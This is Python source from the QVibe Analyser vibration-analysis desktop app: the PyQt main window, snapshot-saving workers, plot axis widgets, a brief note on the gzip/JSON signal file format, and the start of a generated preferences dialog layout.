from model.preferences import RECORDER_TARGET_FS, RECORDER_TARGET_SAMPLES_PER_BATCH, RECORDER_TARGET_ACCEL_ENABLED, \
RECORDER_TARGET_ACCEL_SENS, RECORDER_TARGET_GYRO_ENABLED, RECORDER_TARGET_GYRO_SENS, RECORDER_SAVED_IPS
from ui.app import Ui_MainWindow
from model.recorders import RecorderStore, RecorderConfig
logger = logging.getLogger('qvibe')
class QVibe(QMainWindow, Ui_MainWindow):
snapshot_saved = QtCore.Signal(int, str, object)
def __init__(self, app, prefs, parent=None):
super(QVibe, self).__init__(parent)
self.logger = logging.getLogger('qvibe')
self.app = app
self.preferences = prefs
# basic setup and version checking
if getattr(sys, 'frozen', False):
self.__style_path_root = sys._MEIPASS
else:
self.__style_path_root = os.path.dirname(__file__)
self.__version = '0.0.0-alpha.1'
v_path = os.path.abspath(os.path.join(self.__style_path_root, 'VERSION'))
try:
with open(v_path) as version_file:
self.__version = version_file.read().strip()
except:
logger.exception(f"Unable to read {v_path}")
global_thread_pool = QThreadPool.globalInstance()
global_thread_pool.setMaxThreadCount(QThread.idealThreadCount() + 4)
if self.preferences.get(SYSTEM_CHECK_FOR_UPDATES):
global_thread_pool.start(VersionChecker(self.preferences.get(SYSTEM_CHECK_FOR_BETA_UPDATES),
self.__alert_on_old_version,
self.__alert_on_version_check_fail,
self.__version))
# UI initialisation
self.setupUi(self)
# run a twisted reactor as its responsiveness is embarrassingly better than QTcpSocket
from twisted.internet import reactor
self.__reactor = reactor
runner = ReactorRunner(self.__reactor)
global_thread_pool.reserveThread()
global_thread_pool.start(runner)
self.app.aboutToQuit.connect(runner.stop)
# core domain stores
self.__timer = None
self.__start_time = None
self.__target_config = self.__load_config()
self.__display_target_config()
self.__measurement_store = MeasurementStore(self.measurementLayout, self.measurementBox, self.bufferSize,
self.preferences, self.__target_config)
self.__measurement_store.signals.data_changed.connect(self.__display_measurement)
self.__measurement_store.signals.measurement_added.connect(self.__display_measurement)
self.__measurement_store.signals.visibility_changed.connect(self.__set_visible_measurements)
self.__recorder_store = RecorderStore(self.__target_config,
self.recordersLayout,
self.centralwidget,
self.__reactor,
self.__measurement_store)
self.__recorder_store.signals.on_status_change.connect(self.__handle_recorder_connect_event)
target_resolution = f"{self.preferences.get(ANALYSIS_RESOLUTION)} Hz"
self.resolutionHz.setCurrentText(target_resolution)
# menus
self.log_viewer = RollingLogger(self.preferences, parent=self)
self.actionShow_Logs.triggered.connect(self.log_viewer.show_logs)
self.action_Preferences.triggered.connect(self.show_preferences)
self.actionSave_Chart.triggered.connect(self.export_chart)
self.actionExport_Wav.triggered.connect(self.export_wav)
# buffer
self.bufferSize.setValue(self.preferences.get(BUFFER_SIZE))
# magnitude range
self.magMin.setValue(self.preferences.get(CHART_MAG_MIN))
self.magMax.setValue(self.preferences.get(CHART_MAG_MAX))
def keep_min_mag_range():
keep_range(self.magMin, self.magMax, 20)
self.magMin.valueChanged['int'].connect(lambda v: keep_min_mag_range())
self.magMax.valueChanged['int'].connect(lambda v: keep_min_mag_range())
# frequency range
self.freqMin.setValue(self.preferences.get(CHART_FREQ_MIN))
self.freqMax.setValue(self.preferences.get(CHART_FREQ_MAX))
def keep_min_freq_range():
keep_range(self.freqMin, self.freqMax, 20)
self.freqMin.valueChanged['int'].connect(lambda v: keep_min_freq_range())
self.freqMax.valueChanged['int'].connect(lambda v: keep_min_freq_range())
# charts
colour_provider = ColourProvider()
self.__analysers = {
0: Vibration(self.liveVibrationChart, self.preferences, self.targetSampleRate, self.fps, self.actualFPS,
self.resolutionHz, self.targetAccelSens, self.bufferSize, self.vibrationAnalysis,
self.leftMarker, self.rightMarker, self.timeRange, self.zoomInButton, self.zoomOutButton,
self.findPeaksButton, colour_provider),
1: RTA(self.rtaLayout, self.rtaTab, self.rtaChart, self.preferences, self.targetSampleRate,
self.resolutionHz, self.fps, self.actualFPS, self.magMin, self.magMax, self.freqMin, self.freqMax,
self.refCurve, self.showValueFor, self.__measurement_store.signals, colour_provider),
2: Spectrogram(self.spectrogramView, self.preferences, self.targetSampleRate, self.fps, self.actualFPS,
self.resolutionHz, self.bufferSize, self.magMin, self.magMax, self.freqMin, self.freqMax,
self.visibleCurves, self.__measurement_store),
}
self.__start_analysers()
self.set_visible_chart(self.chartTabs.currentIndex())
self.applyTargetButton.setIcon(qta.icon('fa5s.check', color='green'))
self.resetTargetButton.setIcon(qta.icon('fa5s.undo'))
self.visibleCurves.selectAll()
# load saved recorders
saved_recorders = self.preferences.get(RECORDER_SAVED_IPS)
warn_on_no_recorders = False
if saved_recorders is not None:
self.__recorder_store.load(saved_recorders.split('|'))
else:
warn_on_no_recorders = True
# show preferences if we have no IPs
if warn_on_no_recorders is True:
result = QMessageBox.question(self,
'No Recorders',
f"No qvibe-recorders have been added. \n\nUse the preferences screen to add then.\n\nWould you like to add one now?",
QMessageBox.Yes | QMessageBox.No,
QMessageBox.No)
if result == QMessageBox.Yes:
self.show_preferences()
self.saveSnapshotButton.setIcon(qta.icon('fa5s.save'))
self.saveSnapshotButton.clicked.connect(self.__save_snapshot)
self.zoomInButton.setIcon(qta.icon('fa5s.compress-arrows-alt'))
self.zoomOutButton.setIcon(qta.icon('fa5s.expand-arrows-alt'))
self.loadMeasurementButton.setIcon(qta.icon('fa5s.folder-open'))
self.actionSave_Signal.triggered.connect(self.__save_signal)
self.actionLoad_Signal.triggered.connect(self.__load_signal)
self.loadMeasurementButton.clicked.connect(self.__load_signal)
self.connectAllButton.clicked.connect(self.__recorder_store.connect)
self.disconnectAllButton.clicked.connect(self.__recorder_store.disconnect)
self.snapshot_saved.connect(self.__add_snapshot)
self.__measurement_store.load_snapshots()
def __set_visible_measurements(self, measurement):
'''
Propagates the visible measurements to the charts.
'''
keys = self.__measurement_store.get_visible_measurements()
for c in self.__analysers.values():
c.set_visible_measurements(keys)
def __display_measurement(self, measurement):
'''
Updates the charts with the data from the current measurement.
:param measurement: the measurement.
'''
if measurement.visible is True:
if measurement.latest_data is not None:
for c in self.__analysers.values():
# TODO must unwrap
c.accept(measurement.key, measurement.data, measurement.idx)
else:
logger.info(f"Hiding {measurement}")
def __save_snapshot(self):
''' Triggers the snapshot save job. '''
runner = SnapshotSaver(int(self.snapSlotSelector.currentText()), self.preferences,
lambda: self.__capture_snap(convert=False), self.__measurement_store,
self.snapshot_saved)
QThreadPool.globalInstance().start(runner)
def __add_snapshot(self, id, ip, data):
self.__measurement_store.add_snapshot(id, ip, data)
def __save_signal(self):
''' Saves the current data to a file. '''
dat = self.__capture_snap()
if len(dat.keys()) > 0:
file_name = QFileDialog(self).getSaveFileName(self, 'Save Signal', f"signal.qvibe", "QVibe Signals (*.qvibe)")
file_name = str(file_name[0]).strip()
if len(file_name) > 0:
with gzip.open(file_name, 'wb+') as outfile:
outfile.write(json.dumps(dat).encode('utf-8'))
self.statusbar.showMessage(f"Saved to {file_name}")
else:
msg_box = QMessageBox()
msg_box.setText('No data has been recorded')
msg_box.setIcon(QMessageBox.Warning)
msg_box.setWindowTitle('Nothing to Save')
msg_box.exec()
def __capture_snap(self, convert=True):
        ''' Snaps the available data into a dict for saving. '''
return {k: np_to_str(v) if convert is True else v for k, v in self.__measurement_store.snap_rta().items()}
def __load_signal(self):
'''
Loads a new signal (replacing any current data if required).
'''
parsers = {'qvibe': self.__parse_qvibe}
name, data = parse_file('Signal (*.qvibe)', 'Load Signal', parsers)
if name is not None:
self.statusbar.showMessage(f"Loaded {name}")
for d in data:
self.__measurement_store.append(name, *d)
@staticmethod
def __parse_qvibe(file_name):
'''
Parses a qvibe file.
:param file_name: the file name.
:return: the measurements to load
'''
vals = []
with gzip.open(file_name, 'r') as infile:
dat = json.loads(infile.read().decode('utf-8'))
if dat is not None and len(dat.keys()) > 0:
for ip, data_txt in dat.items():
import io
vals.append([ip, np.loadtxt(io.StringIO(data_txt), dtype=np.float64, ndmin=2)])
return os.path.basename(file_name)[0:-6], vals
return None, None
def reset_recording(self):
'''
Wipes all data from the recorders and the charts.
'''
self.__measurement_store.remove_rta()
self.__recorder_store.reset()
for c in self.__analysers.values():
c.reset()
def __start_analysers(self):
for a in self.__analysers.values():
logger.info(f"Starting processor for {a.__class__.__name__}")
QThreadPool.globalInstance().reserveThread()
a.processor.start()
def stop_processor():
logger.info(f"Stopping processor for {a.__class__.__name__}")
a.processor.stop()
QThreadPool.globalInstance().releaseThread()
logger.info(f"Stopped processor for {a.__class__.__name__}")
self.app.aboutToQuit.connect(stop_processor)
logger.info(f"Started processor for {a.__class__.__name__}")
def __handle_recorder_connect_event(self, ip, connected):
''' reacts to connection status changes.'''
any_connected = self.__recorder_store.any_connected()
self.fps.setEnabled(not any_connected)
self.bufferSize.setEnabled(not any_connected)
if any_connected is True:
self.__on_start_recording()
else:
self.__on_stop_recording()
def __on_start_recording(self):
'''
Starts the data collection timer.
'''
if self.__timer is None:
self.__timer = QTimer()
self.__timer.timeout.connect(self.__collect_signals)
logger.info(f"Starting data collection timer at {self.fps.value()} fps")
self.__start_time = time.time() * 1000
        self.__timer.start(int(1000 / self.fps.value()))
self.resetButton.setEnabled(False)
def __on_stop_recording(self):
if self.__timer is not None:
logger.info('Stopping data collection timer')
self.__timer.stop()
self.resetButton.setEnabled(True)
def __collect_signals(self):
''' collects the latest signal and pushes it into the analysers. '''
elapsed = round((time.time() * 1000) - self.__start_time)
new_time = QTime(0, 0, 0, 0).addMSecs(elapsed)
self.elapsedTime.setTime(new_time)
for recorder_name, signal, idx, errored in self.__recorder_store.snap():
if len(signal) > 0:
if errored is True:
msg_box = QMessageBox()
msg_box.setText(f"{recorder_name} has overflowed, data will be unreliable \n\n If this occurs repeatedly, try increasing batch size or reducing sample rate via the Sensor Config panel")
msg_box.setIcon(QMessageBox.Critical)
msg_box.setWindowTitle('Overflow')
msg_box.exec()
self.__measurement_store.append('rta', recorder_name, signal, idx)
def update_target(self):
''' updates the current target config from the UI values. '''
self.__target_config.fs = self.targetSampleRate.value()
self.__target_config.samples_per_batch = self.targetBatchSize.value()
self.__target_config.accelerometer_enabled = self.targetAccelEnabled.isChecked()
self.__target_config.accelerometer_sens = int(self.targetAccelSens.currentText())
self.__target_config.gyro_enabled = self.targetGyroEnabled.isChecked()
self.__target_config.gyro_sens = int(self.targetGyroSens.currentText())
self.freqMax.setMaximum(int(self.__target_config.fs/2))
def __load_config(self):
''' loads a config object from the preferences store '''
config = RecorderConfig()
config.fs = self.preferences.get(RECORDER_TARGET_FS)
config.samples_per_batch = self.preferences.get(RECORDER_TARGET_SAMPLES_PER_BATCH)
config.accelerometer_enabled = self.preferences.get(RECORDER_TARGET_ACCEL_ENABLED)
config.accelerometer_sens = self.preferences.get(RECORDER_TARGET_ACCEL_SENS)
config.gyro_enabled = self.preferences.get(RECORDER_TARGET_GYRO_ENABLED)
config.gyro_sens = self.preferences.get(RECORDER_TARGET_GYRO_SENS)
return config
def __display_target_config(self):
''' updates the displayed target config '''
with block_signals(self.targetSampleRate):
self.targetSampleRate.setValue(self.__target_config.fs)
with block_signals(self.targetBatchSize):
self.targetBatchSize.setValue(self.__target_config.samples_per_batch)
with block_signals(self.targetAccelEnabled):
self.targetAccelEnabled.setChecked(self.__target_config.accelerometer_enabled)
with block_signals(self.targetAccelSens):
self.targetAccelSens.setCurrentText(str(self.__target_config.accelerometer_sens))
with block_signals(self.targetGyroEnabled):
self.targetGyroEnabled.setChecked(self.__target_config.gyro_enabled)
with block_signals(self.targetGyroSens):
self.targetGyroSens.setCurrentText(str(self.__target_config.gyro_sens))
def reset_target(self):
''' resets the target config from preferences. '''
self.__target_config = self.__load_config()
self.__display_target_config()
def apply_target(self):
''' saves the target config to the preferences. '''
self.preferences.set(RECORDER_TARGET_FS, self.__target_config.fs)
self.preferences.set(RECORDER_TARGET_SAMPLES_PER_BATCH, self.__target_config.samples_per_batch)
self.preferences.set(RECORDER_TARGET_ACCEL_ENABLED, self.__target_config.accelerometer_enabled)
self.preferences.set(RECORDER_TARGET_ACCEL_SENS, self.__target_config.accelerometer_sens)
self.preferences.set(RECORDER_TARGET_GYRO_ENABLED, self.__target_config.gyro_enabled)
self.preferences.set(RECORDER_TARGET_GYRO_SENS, self.__target_config.gyro_sens)
self.__recorder_store.target_config = self.__target_config
self.__measurement_store.target_config = self.__target_config
def set_buffer_size(self, val):
self.preferences.set(BUFFER_SIZE, val)
def set_visible_chart(self, idx):
for c_idx, c in self.__analysers.items():
c.visible = (idx == c_idx)
def set_visible_curves(self):
'''
Propagates the visible axes to the charts.
'''
visible = [c.text() for c in self.visibleCurves.selectedItems()]
for c in self.__analysers.values():
c.set_visible_axes(visible)
def export_chart(self):
'''
Saves the currently selected chart to a file.
'''
idx = self.chartTabs.currentIndex()
chart = None
if idx == 0:
chart = self.liveVibrationChart
elif idx == 1:
chart = self.rtaChart
elif idx == 2:
chart = self.spectrogramView
if chart is not None:
dialog = SaveChartDialog(self, self.__analysers[idx].__class__.__name__, chart, self.statusbar)
dialog.exec()
def export_wav(self):
''' Saves data from a recorder to a file. '''
if len(self.__measurement_store) > 0:
dialog = SaveWavDialog(self,
self.preferences,
self.__measurement_store,
self.targetSampleRate.value(),
int(self.targetAccelSens.currentText()),
self.statusbar)
dialog.exec()
def show_release_notes(self):
''' Shows the release notes '''
QThreadPool.globalInstance().start(VersionChecker(self.preferences.get(SYSTEM_CHECK_FOR_BETA_UPDATES),
self.__alert_on_old_version,
self.__alert_on_version_check_fail,
self.__version,
signal_anyway=True))
@staticmethod
def show_help():
''' Opens the user guide in a browser '''
QDesktopServices.openUrl(QUrl('https://qvibe.readthedocs.io/en/latest'))
@staticmethod
def __alert_on_version_check_fail(message):
'''
Displays an alert if the version check fails.
:param message: the message.
'''
msg_box = QMessageBox()
msg_box.setText(message)
msg_box.setIcon(QMessageBox.Warning)
msg_box.setWindowTitle('Unable to Complete Version Check')
msg_box.exec()
def __alert_on_old_version(self, versions, issues):
''' Presents a dialog if there is a new version available. '''
ReleaseNotesDialog(self, versions, issues).exec()
def setupUi(self, main_window):
super().setupUi(self)
geometry = self.preferences.get(SCREEN_GEOMETRY)
if geometry is not None:
self.restoreGeometry(geometry)
else:
screen_geometry = self.app.desktop().availableGeometry()
if screen_geometry.height() < 800:
self.showMaximized()
window_state = self.preferences.get(SCREEN_WINDOW_STATE)
if window_state is not None:
self.restoreState(window_state)
def closeEvent(self, *args, **kwargs):
'''
Saves the window state on close.
:param args:
:param kwargs:
'''
self.preferences.set(SCREEN_GEOMETRY, self.saveGeometry())
self.preferences.set(SCREEN_WINDOW_STATE, self.saveState())
super().closeEvent(*args, **kwargs)
self.app.closeAllWindows()
def show_preferences(self):
'''
Shows the preferences dialog.
'''
PreferencesDialog(self.preferences, self.__style_path_root, self.__recorder_store, self.__analysers[2], parent=self).exec()
self.__analysers[1].reload_target()
def show_about(self):
msg_box = QMessageBox()
msg_box.setText(
f"<a href='https://github.com/3ll3d00d/qvibe-analyser'>QVibe Analyser</a> v{self.__version} by 3ll3d00d")
msg_box.setIcon(QMessageBox.Information)
msg_box.setWindowTitle('About')
msg_box.exec()
class SnapshotSaver(QRunnable):
def __init__(self, id, preferences, capturer, store, signal):
super().__init__()
self.__id = id
self.__preferences = preferences
self.__capturer = capturer
self.__store = store
self.__signal = signal
def run(self):
'''
Saves the snapshot to preferences.
'''
start = time.time()
dat = self.__capturer()
logger.info(f"Captured in {to_millis(start, time.time())}ms")
prefs = []
if len(dat.keys()) > 0:
for ip, v in dat.items():
prefs.append(SetPreference(self.__preferences, f"{SNAPSHOT_GROUP}/{self.__id}/{ip}", v))
self.__signal.emit(self.__id, ip, v)
for p in prefs:
QThreadPool.globalInstance().start(p, priority=-1)
logger.info(f"Saved snapshot in {to_millis(start, time.time())}ms")
class SetPreference(QRunnable):
def __init__(self, prefs, key, val):
super().__init__()
self.prefs = prefs
self.key = key
self.val = val
def run(self):
start = time.time()
self.prefs.set(self.key, np_to_str(self.val))
logger.info(f"Set preference in {to_millis(start, time.time())}ms")
def make_app():
app = QApplication(sys.argv)
if getattr(sys, 'frozen', False):
icon_path = os.path.join(sys._MEIPASS, 'Icon.ico')
else:
        icon_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '../icons/Icon.ico'))
if os.path.exists(icon_path):
app.setWindowIcon(QIcon(icon_path))
return app, Preferences(QSettings("3ll3d00d", "qvibe-analyser"))
if __name__ == '__main__':
app, prefs = make_app()
form = QVibe(app, prefs)
# setup the error handler
e_dialog = QErrorMessage(form)
e_dialog.setWindowModality(QtCore.Qt.WindowModal)
font = QFont()
font.setFamily("Consolas")
font.setPointSize(8)
e_dialog.setFont(font)
# add the exception handler so we can see the errors in a QErrorMessage
sys._excepthook = sys.excepthook
def dump_exception_to_log(exctype, value, tb):
import traceback
print(exctype, value, tb)
global e_dialog
if e_dialog is not None:
formatted = traceback.format_exception(etype=exctype, value=value, tb=tb)
e_dialog.setWindowTitle('Unexpected Error')
url = 'https://github.com/3ll3d00d/qvibe-analyser/issues/new'
msg = f"Unexpected Error detected, go to {url} to log the issue<p>{'<br>'.join(formatted)}"
e_dialog.showMessage(msg)
e_dialog.resize(1200, 400)
sys.excepthook = dump_exception_to_log
# show the form and exec the app
form.show()
app.exec_()
class PlotWidgetForSpectrum(pg.PlotWidget):
def __init__(self, parent=None, background='default', **kargs):
super().__init__(parent=parent,
background=background,
axisItems={
'bottom': MinorLevelsAxisItem(orientation='bottom'),
'left': MinorLevelsAxisItem(orientation='left')
},
**kargs)
class PlotWidgetWithDateAxis(pg.PlotWidget):
def __init__(self, parent=None, background='default', **kargs):
super().__init__(parent=parent,
background=background,
axisItems={
'bottom': TimeAxisItem(orientation='bottom'),
'left': MinorLevelsAxisItem(orientation='left')
},
**kargs)
class PlotWidgetForSpectrogram(pg.PlotWidget):
def __init__(self, parent=None, background='default', **kargs):
super().__init__(parent=parent,
background=background,
axisItems={'left': Inverse(orientation='left')},
**kargs)
class Inverse(pg.AxisItem):
def __init__(self, *args, **kwargs):
super(Inverse, self).__init__(*args, **kwargs)
def tickStrings(self, values, scale, spacing):
return values[::-1]
class MinorLevelsAxisItem(pg.AxisItem):
def tickSpacing(self, minVal, maxVal, size):
return bump_tick_levels(super(), minVal, maxVal, size)
class TimeAxisItem(MinorLevelsAxisItem):
def tickStrings(self, values, scale, spacing):
import datetime
return [str(datetime.timedelta(seconds=value)).split('.')[0] for value in values]
```
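`__save_signal` and `__parse_qvibe` above imply a simple container format: a gzip'd JSON dict mapping measurement name to whitespace-delimited sample text. Below is a hedged round-trip sketch; it assumes `np_to_str` (defined in `common`, not shown here) emits text that `np.loadtxt` can read back, so `np.savetxt` stands in for it.
```python
import gzip
import io
import json

import numpy as np

def save_qvibe(file_name, measurements):
    ''' mirrors __save_signal: measurements is a dict of name -> 2-D ndarray. '''
    payload = {}
    for name, arr in measurements.items():
        buf = io.StringIO()
        np.savetxt(buf, arr)  # stand-in for np_to_str from common
        payload[name] = buf.getvalue()
    with gzip.open(file_name, 'wb') as out:
        out.write(json.dumps(payload).encode('utf-8'))

def load_qvibe(file_name):
    ''' mirrors __parse_qvibe. '''
    with gzip.open(file_name, 'r') as infile:
        dat = json.loads(infile.read().decode('utf-8'))
    return {name: np.loadtxt(io.StringIO(txt), dtype=np.float64, ndmin=2)
            for name, txt in dat.items()}

save_qvibe('demo.qvibe', {'192.168.1.100': np.arange(12.0).reshape(4, 3)})
print(load_qvibe('demo.qvibe')['192.168.1.100'].shape)  # -> (4, 3)
```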
#### File: python/ui/preferences.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_preferencesDialog(object):
def setupUi(self, preferencesDialog):
preferencesDialog.setObjectName("preferencesDialog")
preferencesDialog.resize(490, 426)
self.verticalLayout = QtWidgets.QVBoxLayout(preferencesDialog)
self.verticalLayout.setObjectName("verticalLayout")
self.panes = QtWidgets.QVBoxLayout()
self.panes.setObjectName("panes")
self.userLayout = QtWidgets.QGridLayout()
self.userLayout.setObjectName("userLayout")
self.wavSaveDirLabel = QtWidgets.QLabel(preferencesDialog)
self.wavSaveDirLabel.setObjectName("wavSaveDirLabel")
self.userLayout.addWidget(self.wavSaveDirLabel, 1, 0, 1, 1)
self.wavSaveDirPicker = QtWidgets.QToolButton(preferencesDialog)
self.wavSaveDirPicker.setObjectName("wavSaveDirPicker")
self.userLayout.addWidget(self.wavSaveDirPicker, 1, 2, 1, 1)
self.wavSaveDir = QtWidgets.QLineEdit(preferencesDialog)
self.wavSaveDir.setReadOnly(True)
self.wavSaveDir.setObjectName("wavSaveDir")
self.userLayout.addWidget(self.wavSaveDir, 1, 1, 1, 1)
self.userLayoutLabel = QtWidgets.QLabel(preferencesDialog)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.userLayoutLabel.setFont(font)
self.userLayoutLabel.setFrameShape(QtWidgets.QFrame.Box)
self.userLayoutLabel.setFrameShadow(QtWidgets.QFrame.Sunken)
self.userLayoutLabel.setAlignment(QtCore.Qt.AlignCenter)
self.userLayoutLabel.setObjectName("userLayoutLabel")
self.userLayout.addWidget(self.userLayoutLabel, 0, 0, 1, 3)
self.panes.addLayout(self.userLayout)
self.displayPane = QtWidgets.QGridLayout()
self.displayPane.setObjectName("displayPane")
self.rtaLabel = QtWidgets.QLabel(preferencesDialog)
self.rtaLabel.setObjectName("rtaLabel")
self.displayPane.addWidget(self.rtaLabel, 1, 0, 1, 1)
self.displayLayoutLabel = QtWidgets.QLabel(preferencesDialog)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.displayLayoutLabel.setFont(font)
self.displayLayoutLabel.setFrameShape(QtWidgets.QFrame.Box)
self.displayLayoutLabel.setFrameShadow(QtWidgets.QFrame.Sunken)
self.displayLayoutLabel.setAlignment(QtCore.Qt.AlignCenter)
self.displayLayoutLabel.setObjectName("displayLayoutLabel")
self.displayPane.addWidget(self.displayLayoutLabel, 0, 0, 1, 3)
self.targetLabel = QtWidgets.QLabel(preferencesDialog)
self.targetLabel.setObjectName("targetLabel")
self.displayPane.addWidget(self.targetLabel, 1, 1, 1, 1)
self.spectroScaleFactor = QtWidgets.QComboBox(preferencesDialog)
self.spectroScaleFactor.setObjectName("spectroScaleFactor")
self.spectroScaleFactor.addItem("")
self.spectroScaleFactor.addItem("")
self.spectroScaleFactor.addItem("")
self.spectroScaleFactor.addItem("")
self.spectroScaleFactor.addItem("")
self.spectroScaleFactor.addItem("")
self.displayPane.addWidget(self.spectroScaleFactor, 2, 2, 1, 1)
self.spectroScaleLabel = QtWidgets.QLabel(preferencesDialog)
self.spectroScaleLabel.setObjectName("spectroScaleLabel")
self.displayPane.addWidget(self.spectroScaleLabel, 2, 0, 2, 1)
self.spectroScaleAlgoLabel = QtWidgets.QLabel(preferencesDialog)
self.spectroScaleAlgoLabel.setObjectName("spectroScaleAlgoLabel")
self.displayPane.addWidget(self.spectroScaleAlgoLabel, 3, 1, 1, 1)
self.spectroScaleFactorLabel = QtWidgets.QLabel(preferencesDialog)
self.spectroScaleFactorLabel.setObjectName("spectroScaleFactorLabel")
self.displayPane.addWidget(self.spectroScaleFactorLabel, 2, 1, 1, 1)
self.targetLayout = QtWidgets.QHBoxLayout()
self.targetLayout.setObjectName("targetLayout")
self.loadTarget = QtWidgets.QToolButton(preferencesDialog)
self.loadTarget.setObjectName("loadTarget")
self.targetLayout.addWidget(self.loadTarget)
self.clearTarget = QtWidgets.QToolButton(preferencesDialog)
self.clearTarget.setObjectName("clearTarget")
self.targetLayout.addWidget(self.clearTarget)
self.createTarget = QtWidgets.QToolButton(preferencesDialog)
self.createTarget.setObjectName("createTarget")
self.targetLayout.addWidget(self.createTarget)
self.targetSet = QtWidgets.QCheckBox(preferencesDialog)
self.targetSet.setEnabled(False)
self.targetSet.setObjectName("targetSet")
self.targetLayout.addWidget(self.targetSet)
self.displayPane.addLayout(self.targetLayout, 1, 2, 1, 1)
self.spectroScaleAlgo = QtWidgets.QComboBox(preferencesDialog)
self.spectroScaleAlgo.setObjectName("spectroScaleAlgo")
self.spectroScaleAlgo.addItem("")
self.spectroScaleAlgo.addItem("")
self.spectroScaleAlgo.addItem("")
self.spectroScaleAlgo.addItem("")
self.spectroScaleAlgo.addItem("")
self.displayPane.addWidget(self.spectroScaleAlgo, 3, 2, 1, 1)
self.displayPane.setColumnStretch(2, 1)
self.panes.addLayout(self.displayPane)
self.analysisPane = QtWidgets.QGridLayout()
self.analysisPane.setObjectName("analysisPane")
self.zScaleLabel = QtWidgets.QLabel(preferencesDialog)
self.zScaleLabel.setObjectName("zScaleLabel")
self.analysisPane.addWidget(self.zScaleLabel, 1, 4, 1, 1)
self.xScale = QtWidgets.QDoubleSpinBox(preferencesDialog)
self.xScale.setObjectName("xScale")
self.analysisPane.addWidget(self.xScale, 1, 1, 1, 1)
self.magMin = QtWidgets.QSpinBox(preferencesDialog)
self.magMin.setMaximum(150)
self.magMin.setObjectName("magMin")
self.analysisPane.addWidget(self.magMin, 2, 1, 1, 1)
self.xScaleLabel = QtWidgets.QLabel(preferencesDialog)
self.xScaleLabel.setObjectName("xScaleLabel")
self.analysisPane.addWidget(self.xScaleLabel, 1, 0, 1, 1)
self.analysisLayoutLabel = QtWidgets.QLabel(preferencesDialog)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.analysisLayoutLabel.setFont(font)
self.analysisLayoutLabel.setFrameShape(QtWidgets.QFrame.Box)
self.analysisLayoutLabel.setFrameShadow(QtWidgets.QFrame.Sunken)
self.analysisLayoutLabel.setAlignment(QtCore.Qt.AlignCenter)
self.analysisLayoutLabel.setObjectName("analysisLayoutLabel")
self.analysisPane.addWidget(self.analysisLayoutLabel, 0, 0, 1, 6)
self.magMaxLabel = QtWidgets.QLabel(preferencesDialog)
self.magMaxLabel.setObjectName("magMaxLabel")
self.analysisPane.addWidget(self.magMaxLabel, 2, 2, 1, 1)
self.yScale = QtWidgets.QDoubleSpinBox(preferencesDialog)
self.yScale.setObjectName("yScale")
self.analysisPane.addWidget(self.yScale, 1, 3, 1, 1)
self.zScale = QtWidgets.QDoubleSpinBox(preferencesDialog)
self.zScale.setObjectName("zScale")
self.analysisPane.addWidget(self.zScale, 1, 5, 1, 1)
self.yScaleLabel = QtWidgets.QLabel(preferencesDialog)
self.yScaleLabel.setObjectName("yScaleLabel")
self.analysisPane.addWidget(self.yScaleLabel, 1, 2, 1, 1)
self.maxMinLabel = QtWidgets.QLabel(preferencesDialog)
self.maxMinLabel.setObjectName("maxMinLabel")
self.analysisPane.addWidget(self.maxMinLabel, 2, 0, 1, 1)
self.magMax = QtWidgets.QSpinBox(preferencesDialog)
self.magMax.setMaximum(150)
self.magMax.setProperty("value", 150)
self.magMax.setObjectName("magMax")
self.analysisPane.addWidget(self.magMax, 2, 3, 1, 1)
self.freqMinLabel = QtWidgets.QLabel(preferencesDialog)
self.freqMinLabel.setObjectName("freqMinLabel")
self.analysisPane.addWidget(self.freqMinLabel, 3, 0, 1, 1)
self.freqMaxLabel = QtWidgets.QLabel(preferencesDialog)
self.freqMaxLabel.setObjectName("freqMaxLabel")
self.analysisPane.addWidget(self.freqMaxLabel, 3, 2, 1, 1)
self.freqMin = QtWidgets.QSpinBox(preferencesDialog)
self.freqMin.setMinimum(0)
self.freqMin.setMaximum(1000)
self.freqMin.setProperty("value", 0)
self.freqMin.setObjectName("freqMin")
self.analysisPane.addWidget(self.freqMin, 3, 1, 1, 1)
self.freqMax = QtWidgets.QSpinBox(preferencesDialog)
self.freqMax.setMinimum(1)
self.freqMax.setMaximum(1000)
self.freqMax.setProperty("value", 125)
self.freqMax.setObjectName("freqMax")
self.analysisPane.addWidget(self.freqMax, 3, 3, 1, 1)
self.detrendLabel = QtWidgets.QLabel(preferencesDialog)
self.detrendLabel.setObjectName("detrendLabel")
self.analysisPane.addWidget(self.detrendLabel, 2, 4, 1, 1)
self.detrend = QtWidgets.QComboBox(preferencesDialog)
self.detrend.setObjectName("detrend")
self.detrend.addItem("")
self.detrend.addItem("")
self.detrend.addItem("")
self.analysisPane.addWidget(self.detrend, 2, 5, 1, 1)
self.highpassRTA = QtWidgets.QCheckBox(preferencesDialog)
self.highpassRTA.setObjectName("highpassRTA")
self.analysisPane.addWidget(self.highpassRTA, 3, 4, 1, 2)
self.panes.addLayout(self.analysisPane)
self.recordersPane = QtWidgets.QGridLayout()
self.recordersPane.setObjectName("recordersPane")
self.recorderIP = QtWidgets.QLineEdit(preferencesDialog)
self.recorderIP.setObjectName("recorderIP")
self.recordersPane.addWidget(self.recorderIP, 1, 1, 1, 1)
self.deleteRecorderButton = QtWidgets.QToolButton(preferencesDialog)
self.deleteRecorderButton.setObjectName("deleteRecorderButton")
self.recordersPane.addWidget(self.deleteRecorderButton, 2, 2, 1, 1)
self.ipAddressLabel = QtWidgets.QLabel(preferencesDialog)
self.ipAddressLabel.setObjectName("ipAddressLabel")
self.recordersPane.addWidget(self.ipAddressLabel, 1, 0, 2, 1)
self.analysisLayoutLabel1 = QtWidgets.QLabel(preferencesDialog)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.analysisLayoutLabel1.setFont(font)
self.analysisLayoutLabel1.setFrameShape(QtWidgets.QFrame.Box)
self.analysisLayoutLabel1.setFrameShadow(QtWidgets.QFrame.Sunken)
self.analysisLayoutLabel1.setAlignment(QtCore.Qt.AlignCenter)
self.analysisLayoutLabel1.setObjectName("analysisLayoutLabel1")
self.recordersPane.addWidget(self.analysisLayoutLabel1, 0, 0, 1, 3)
self.recorders = QtWidgets.QComboBox(preferencesDialog)
self.recorders.setObjectName("recorders")
self.recordersPane.addWidget(self.recorders, 2, 1, 1, 1)
self.addRecorderButton = QtWidgets.QToolButton(preferencesDialog)
self.addRecorderButton.setObjectName("addRecorderButton")
